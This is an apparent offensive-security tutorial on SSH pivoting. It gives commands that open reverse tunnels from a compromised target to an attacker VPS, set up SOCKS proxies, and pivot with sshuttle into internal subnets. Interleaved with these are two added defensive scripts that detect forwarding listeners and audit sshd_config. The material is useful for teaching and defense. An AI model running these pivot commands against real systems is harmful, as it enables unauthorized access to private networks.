SSH Pivoting

SSH pivoting combines SSH port forwarding methods to reach internal networks from a compromised machine through an intermediary server such as a VPS. This lets you traverse network boundaries and access internal resources.

Port 5555 (or any other free port) on the VPS serves as the reverse tunnel endpoint: connections made to it on the VPS are forwarded through the SSH session the target opened, to the target machine's SSH port. Port 5555 is visible only on the VPS; the target machine sees only an outbound SSH connection to the VPS.

- Connect back

Connect back from the VPS to the compromised target machine, with the traffic encapsulated in the SSH session the target opened.

In target:

ssh -R 5555:localhost:22 root@{VPS_IP}

In VPS:

ssh -p 5555 root@localhost
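On the VPS side, a reverse forward like the one above shows up as an extra listening socket owned by sshd, and a -D or -L started on the VPS shows up as a listener owned by the ssh client. The following is an added example, not code from the original page: a small POSIX shell filter over `ss -tlnp` output that lists exactly those listeners, which is the quickest way to spot an unexpected tunnel on a jump host you operate. The `ss` output embedded in it is constructed for offline use, and the function assumes the column layout that iproute2's `ss` prints (state first, local address:port fourth).

```shell
#!/bin/sh
# Added example (not from the original page): list TCP listeners on this host that
# belong to the SSH daemon or client and are not the SSH service port itself.
# A reverse forward (-R) appears as a listener owned by sshd on the host that
# received it; -D and -L forwards appear as listeners owned by the ssh client.
#
# Constructed sample of `ss -tlnp` output for offline use. On a live host run:
#   ss -tlnp | ssh_forward_listeners
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22       0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      128        127.0.0.1:5555     0.0.0.0:*     users:(("sshd",pid=4021,fd=9))
LISTEN 0      128        127.0.0.1:1080     0.0.0.0:*     users:(("ssh",pid=4100,fd=5))
LISTEN 0      511          0.0.0.0:80       0.0.0.0:*     users:(("nginx",pid=600,fd=6))
LISTEN 0      128             [::]:22          [::]:*     users:(("sshd",pid=812,fd=4))'

# Reads `ss -tlnp` output on stdin and prints "<process> <local address:port>"
# for every LISTEN socket owned by sshd or ssh whose port is not the SSH
# service port (22 unless a different port is passed as $1).
ssh_forward_listeners() {
    svc_port="${1:-22}"
    awk -v svc="$svc_port" '
        $1 == "LISTEN" && match($0, /"sshd?"/) {
            proc = substr($0, RSTART + 1, RLENGTH - 2)   # "sshd" or "ssh"
            n = split($4, parts, ":")                     # port follows the last colon
            if (parts[n] != svc) print proc, $4
        }'
}

# Stand-alone run against the constructed sample.
printf '%s\n' "$SAMPLE_SS" | ssh_forward_listeners
```

Against the sample this reports the sshd-owned listener on 127.0.0.1:5555 (the reverse forward) and the ssh-owned listener on 127.0.0.1:1080 (a dynamic forward), and stays silent about the normal port-22 service and nginx. The loopback binding of port 5555 is what you expect with the sshd default GatewayPorts no; a non-loopback address there would mean the forward is reachable from other hosts.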

- Socks in VPS:

Set up a SOCKS proxy on the VPS to reach the target's internal network. This lets you run tools from the VPS against the target's internal network.

In target (reverse-forward the target's SSH port to port 5555 on the VPS, as in the previous step):

ssh -R 5555:localhost:22 root@{VPS_IP}

In VPS (open an SSH session back to the target through that tunnel and start a SOCKS proxy on port 1080):

ssh -D 1080 -p 5555 root@localhost

Then, to reach the target's internal network from the VPS, point tools at the SOCKS proxy on localhost port 1080.

- Socks in local machine (VPS intermediary):

Set up a SOCKS proxy on the local attacker machine, using the VPS to route traffic through the reverse tunnel into the target's internal network. This lets you run tools from the local machine against the target's internal network.

In target (reverse dynamic forwarding: the target's ssh client acts as a SOCKS proxy, exposed on the VPS as port 5555; this form of -R needs OpenSSH 7.6 or newer):

.\ssh.exe -R 5555 root@{VPS_IP}

In local machine:

.\ssh.exe -L 0.0.0.0:1080:127.0.0.1:5555 root@{VPS_IP} -fCnNq

The SSH command options -fCnNq enable the following: -f puts SSH into the background just before command execution, -C enables compression for the connection, -n redirects stdin from /dev/null, -N prevents the execution of a remote command, and -q silences most warning and diagnostic messages. These options are useful for setting up port forwarding quietly and efficiently.

Then, to reach the target's internal network from the local machine, point tools at the SOCKS proxy on port 1080. Because the listener is bound to 0.0.0.0, any host that can reach the local machine can use it; bind it to 127.0.0.1 instead if that is not intended.

- SSHuttle Transparent Proxying

sshuttle acts like a VPN, providing a way to route all your network traffic through an SSH connection. It simplifies the process of accessing remote networks and resources by transparently forwarding all TCP and DNS traffic, making the remote network appear as if it is part of your local network.

If a proxy is already set up and we have key-based access to an SSH server (our public key is in root's authorized_keys), we can pivot directly with sshuttle and browse websites that are reachable only from that SSH server's network, without needing a browser proxy add-on:

proxychains sshuttle -v -e "ssh -i ~/.ssh/id_rsa" -r root@172.16.173.197 172.16.173.0/24
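On the defensive side, the port forwarding that every SSH step above relies on is governed by a few sshd_config directives. The following is an added example, not code from the original page or from the OpenSSH project: a POSIX shell audit that reads those directives from a config text, applies OpenSSH's documented defaults when a directive is absent (AllowTcpForwarding yes, GatewayPorts no, PermitListen any, PermitOpen any), and honours sshd's rule that the first occurrence of a directive wins. The config it embeds is constructed. It inspects only the global section, because Match blocks can override these per user or address. One caveat it cannot express: sshuttle does not use SSH port forwarding at all, it runs a helper over the session's standard input and output, so AllowTcpForwarding no does not stop it; restricting what the account can execute (ForceCommand, a restricted shell) is what limits that path.

```shell
#!/bin/sh
# Added example (not from the original page): report sshd_config settings that
# leave SSH port forwarding available, using OpenSSH's documented defaults for
# directives that are absent. Only the global section (before the first Match
# block) is examined, since Match blocks can override these selectively.
#
# Constructed sample config for offline use (not a real host's config). The
# global AllowTcpForwarding line is commented out, so the default applies.
SAMPLE_CONF='# sshd_config (constructed sample)
Port 22
PermitRootLogin prohibit-password
#AllowTcpForwarding no
GatewayPorts yes
Match User deploy
    AllowTcpForwarding no'

# Effective global value of one directive, or its default when it is absent.
# $1 = config text, $2 = directive name (case-insensitive), $3 = default value
sshd_effective() {
    printf '%s\n' "$1" | awk -v key="$2" -v def="$3" '
        tolower($1) == "match" { exit }                          # global section ends here
        $1 ~ /^#/ || NF == 0 { next }                            # comments and blank lines
        tolower($1) == tolower(key) && val == "" { val = $2 }    # first occurrence wins
        END { print (val == "" ? def : val) }'
}

# Print one finding per setting that keeps forwarding (or wide forwarding) on.
# Prints nothing when AllowTcpForwarding is "no", since the rest is then moot.
sshd_forwarding_findings() {
    conf="$1"
    fwd=$(sshd_effective "$conf" AllowTcpForwarding yes)
    [ "$fwd" = "no" ] && return 0
    printf 'AllowTcpForwarding=%s: -L/-R/-D forwarding permitted\n' "$fwd"
    gw=$(sshd_effective "$conf" GatewayPorts no)
    [ "$gw" = "no" ] || printf 'GatewayPorts=%s: -R listeners may bind to non-loopback addresses\n' "$gw"
    listen=$(sshd_effective "$conf" PermitListen any)
    [ "$listen" != "any" ] || printf 'PermitListen=any: -R may listen on any port\n'
    open=$(sshd_effective "$conf" PermitOpen any)
    [ "$open" != "any" ] || printf 'PermitOpen=any: -L/-D may reach any destination\n'
}

# Stand-alone run against the constructed sample. On a real host:
#   sshd_forwarding_findings "$(cat /etc/ssh/sshd_config)"
sshd_forwarding_findings "$SAMPLE_CONF"
```

For the sample this yields four findings: forwarding is on by default because the only AllowTcpForwarding line in the global section is a comment, GatewayPorts yes would let a -R listener such as the 5555 tunnel above bind to an external address, and the absent PermitListen/PermitOpen leave both ends unrestricted. Where forwarding is legitimately needed, PermitListen and PermitOpen are the directives that narrow it to specific ports and destinations.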
